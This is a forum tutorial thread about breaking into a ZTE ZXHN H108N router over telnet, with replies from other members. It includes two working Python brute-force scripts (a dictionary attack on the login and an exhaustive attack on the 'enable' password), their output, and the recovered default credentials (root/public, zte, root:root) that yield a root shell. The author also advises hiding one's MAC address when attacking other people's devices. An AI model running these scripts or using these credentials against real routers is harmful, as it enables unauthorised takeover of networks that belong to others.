[Ligeti]

Hello


I did this for fun only... nothing really special, this is just a story (a true one)


Setup

OK, I have a ZTE router: ZXHN H108N, that is I am connected to using wlan0 interface (wireless), and the gateway is 192.168.1.1, the goal is to gain access to the shell!

I am (recently only) running Mint 16, not Kali, not BT5 and of course not Mickey Mouse (Windows)!

Reconnaissance and Footprinting
Note: as this is my router I didn't have to worry about hidding (going anonemous) by changing MAC address and so on... but I would recommend doing so if you are pentesting/hacking someone!

So first thing to do is to scan the ports and OS banner (to determine the OS) and so on! For that I used nmap:

Code:

nmap -F 192.168.1.1 -O

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-20 00:03 EEST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.0035s latency).
Not shown: 97 closed ports
PORT    STATE SERVICE
23/tcp  open  telnet
80/tcp  open  http
443/tcp open  https
MAC Address: 54:22:F8:16:67:1F (zte)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds

I used a fast scan (-F option) for no reason really, I could do a full TCP scan or even include UDP... but I would like to keep things ... simple!

So as you can see the OS is Linux 2.6.9-30 and there are three ports opened... and holy crap this router is running Telnet!!! This should be fun (and it was!)

Gaining Access
So the next thing is to try and connect to the router via Telnet, so I did the following:

Code:

ligeti-Studio-1558 ~ # telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

      ************************************************************
                          Welcome to the world of CLI !
      ************************************************************
Username:

Hmmm... I need the user name and password to access the CLI (Command Line Interface)! Well... tbh I just tried couple of random usernames (I had 3 chanced before the connection is lost), the first one was "admin" and it returned "% Bad username!" but then I thought to myself: "If I want to access the shell as root... the username should be root right? duh!!!", so entered "root" and it was correct, but for the password I tried couple of known passwords such as {toor, root, admin, admin123, ...} none worked (I failed)! I could go on for hours/days/weeks... but I want to access the shell and I wanted NOW!!!

The Attack 0x00

So, what do I have so far?

• IP address
  
• Telnet access (opened)
  
• CLI
  
• Username
  

I need the password!

Well... for no reason I decided to write my own tool to crack the password, using dictionay attack, I was lucky! because I used a very small wordlist (1275 words only), the wordlist (or dictionary) is made of the most common used passwords, I don't remember where I got this list from, but it is not important really!

My code:

Code:

#ZTE_Hacking
# execfile('/home/ligeti/Scripts/ZTE_Script.py')
import telnetlib
import time
from sys import stdout

wordlist = '/home/ligeti/wordlists/wordlist.txt'
# Load the wordlist file
with open(wordlist, 'r+') as f:
    # Read the file
    lines = f.readlines()
    # Telnet
    connection = telnetlib.Telnet()
    # Testing
    for password in lines:
        try:
            print '\r' + '\t' + time.ctime(time.time())  + '\t' + password.strip('\r\n'),
            stdout.flush()
            # Connect to the router (Telnet)
            connection.open('192.168.1.1')
            # Read until the server/Router asks for username
            chk = connection.read_until("Username:")
            # Send the username (root)
            connection.write("root\n")
            # Read until the server/Router asks for password!
            chk = connection.read_until('Password:')
            #send the password that we are currently testing
            connection.write(password)
            # this is important, I actually don't know
            # how to check if this password is correct
            # but I know that it will keep asking for the password in case if it is not!
            # So I will check for the "Password:" string and if I get a delay
            # for 1 second then this could mean that this is the correct password!
            chk = connection.read_until('Password:', 5)
            # Extra check: checking that the router didn't respond with "% Bad username!"
            if ('Bad' not in chk):
                connection.close()
                print "\nHacked: " + password
                break
            connection.close()
        except Exception, e:
            print 'Error (' + password.strip('\r\n') + '): ' + str(e)

Note: the script is dirty, and I don't care, all I want is the password! If you are irritated by my script please feel free to post a better one, but please do it quietly please, the script is not the main topic for this thread! Or for any of my threads... ever! I am asking this with all my respect of course.

So here is the output (took a while to finish):

Code:

>>> execfile('/home/ligeti/Scripts/ZTE_Script.py')
    Tue Jun 24 23:17:13 2014    888888 Error (888888): telnet connection closed
    Tue Jun 24 23:17:46 2014    angela1 Error (angela1): telnet connection closed
    .
    .
    .        
    Tue Jun 24 23:31:46 2014    parrot Error (parrot): telnet connection closed
    Tue Jun 24 23:32:10 2014    public  
Hacked: public

Bingo! The password is "public", time to test:

Code:

ligeti-Studio-1558 ~ # telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

          ************************************************************
                          Welcome to the world of CLI !
          ************************************************************
Username:root
Password:
CLI>?
Exec commands:
  enable  Turn on privileged commands.
  exit    Quit from telnet.
  ping    Ping the destination.
CLI>enable
Password:

Explanation:

• I connect to 192.168.1.1:23 (telnet).
  
• I enter the user name and password (root/public).
  
• I see CLI> prompt (similar to Cisco routers) so I try '?' for help.
  
• I see enable command, which switch the CLI to config mode.
  

The Attack 0x01

And now I need the password to enable the config mode, I tested some passwords manually, and I guessed it successfully after few attempts, BUT... let's try brute-force the damn thing

The password is alphanumeric, so my charset will be:

Code:

>>> string.ascii_letters + string.digits
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

So I need a code to test the combination of all these letters ... crazy eh? becaue the total tries for only three characters password would be:

Code:

>>> pow(len(string.ascii_letters + string.digits), 3)
238328

And for 8 characters:

Code:

>>> pow(len(string.ascii_letters + string.digits), 8)
218340105584896L

I have no time for this ... so I will show you a simple script (just for fun), that will check only 3 characters long passwords (and only with string.lowercase charset)

Code:

#ZTE_Enable
# execfile('/home/ligeti/Scripts/ZTE_Enable.py')
import telnetlib
import time
from sys import stdout
import itertools
import string

password = []
connection = telnetlib.Telnet()
print "Connecting to router"
connection.open('192.168.1.1')

print "Connecting to CLI"
chk = connection.read_until('Username:')
connection.write('root\n')
chk = connection.read_until('Password:')
connection.write('public\n')

chk = connection.read_until('CLI>')

print "Generating wordlist"
wordlist = itertools.product(string.lowercase, repeat=3)
for word in wordlist:
    password.append(''.join(word))
print "Attacking..."
index = 0
while (index < len(password)):
    connection.write('enable\n')
    chk = connection.read_until('Password:')
    for i in range(0, 3):
        print '\r' + str(index) + '\t' + time.ctime(time.time())  + '\t' + password[index],
        stdout.flush()
        connection.write(password[index] + '\n')
        chk = connection.read_until('Password:', 1)
        index += 1
    if ('Bad' not in chk):
        print "\nHacked: " + password[index-1]
        break

Output (took +4 hours to finish)

Code:

>>> execfile('/home/ligeti/Scripts/ZTE_Enable.py')
Connecting to router
Connecting to CLI
Generating wordlist
Attacking...
17398    Wed Jun 25 00:59:00 2014    zte
Hacked: zte

Yes it was 'zte', something I did guess by myself, and with this information I could actually access the config mode:

Code:

CLI>enable
Password:
CLI#?
Exec commands:
  allgreenledon   set all green led on
  allledoff       set all led off
  allledon        set all led on
  configure       Enter configuration mode.
  disable         Exit from privilege mode.
  exit            Quit from telnet.
  macaddr         show or set mac address
  ping            Ping the destination.
  reboot          Reboot device.
  reset           reset device
  restoredefault  Reset to factory configuration.
  serialnumber    get or set SN
  swversion       show software version
CLI#shell
ZXHN H108N
Login: root
Password:
Password is incorrect
Password:
Password is incorrect
Password:

BusyBox v1.01 (2013.07.10-08:47+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

#

I don't want to make this thread any longer, I know that the subject is boring, but... I had to share (for a very good reason)

So the username and the password for the shell is root:root (easy eh?)

Conclusion
If your router is using Telnet... get another one! If it does use SSH check the version and security! Be very careful with these issues, a misconfigured network device can be the worse nightmare one can have if a hacker find out about it! So always check and double check your network configuration and devies you use!

Thank you and please leave your comment[s] or question[s]

[note] If you are interested in this topic please check my other thread: http://www.hackcommunity.com/Thread-Haki...-TL-WR740N

[chmod]

Another interesting read, I'm sure I have an old telnet enabled router laying around somewhere.

To the attic!

Also why you raging on routers so hard lately lol

[Ligeti]

Another interesting read, I'm sure I have an old telnet enabled router laying around somewhere.

To the attic!

Almost all Cisco and ZTE routers has Telnet enabled on them by default (nowadays)

Also why you raging on routers so hard lately lol

Well... we don't have enough/(or at all) tutorials to cover this area I guess!

Plus, this is a VERY important subject... yet it is sort of ignored! Just imagine what does i mean if you can access the configuration of the firewall in the router, or build a VPN and access the network remotely, or even worse ... implement a MiTM attack (somehow)!?

Anyway, I think this is the last tutorial about routers, I know the subject is boring, people nowadays are more interested in the application layer than networks and network devices (and tbh I don't blame them)

Thanks

[Ex094]

If a router is powered by DDWRT firmware, it definitely has telnet open then I thing I can use this ti access the router right?

[Ligeti]

This router is running BusyBox v1.01...

Telnet is not a vulnerability (as you may already know) but a good attack vector ... the vulnerability is the default username/password! Which can't (yes it can NOT) be avoided easily, Kaminsky talked about this issue in this interview (recommended to watch)



The access is not a problem... it is what you can do after that (with 64kb memory and about 16kb for storage)...

What I hacked so far was iptables and dnsmasq (a simple DNS and DHCP server)... I did check also httpd (apache) and minihttp on other routers.

The problem is... lots of people are using these routers! So you can actually go into any coffeeshop, company, airport, store, resturant... etc. and find these routers (from ZTE, TP-Link and BandLuxe), ISP companies know about this issue and they are ignoring it (totally, royally and intentionally)... Do you know how crazy is this? I thik that the whole country is vulnerable!!!

I downloaded the source code for both DDWRT and OpenWRT to test... it will take me a while though to finish my testing, so if you find anything on your part please let me know and I will gratefully appreciate it

Thanks

[iCode_()]

great tutorial and explanation, thank you for contributing.

Regards, iCode_()!!! :Smile:

[Ligeti]

great tutorial and explanation, thank you for contributing.

Thanks, glad you liked it!

@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!

Thanks

[chmod]

great tutorial and explanation, thank you for contributing.

Thanks, glad you liked it!

@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!

Thanks

Good point, moved.

[Ligeti]

great tutorial and explanation, thank you for contributing.

Thanks, glad you liked it!

@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!

Thanks

Good point, moved.

Thanks mate, and sorry about this confusion, I will try to be more careful next time

Thanks again

[chmod]

great tutorial and explanation, thank you for contributing.

Thanks, glad you liked it!

@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!

Thanks

Good point, moved.

Thanks mate, and sorry about this confusion, I will try to be more careful next time

Thanks again

It happens I know you don't do it intentionally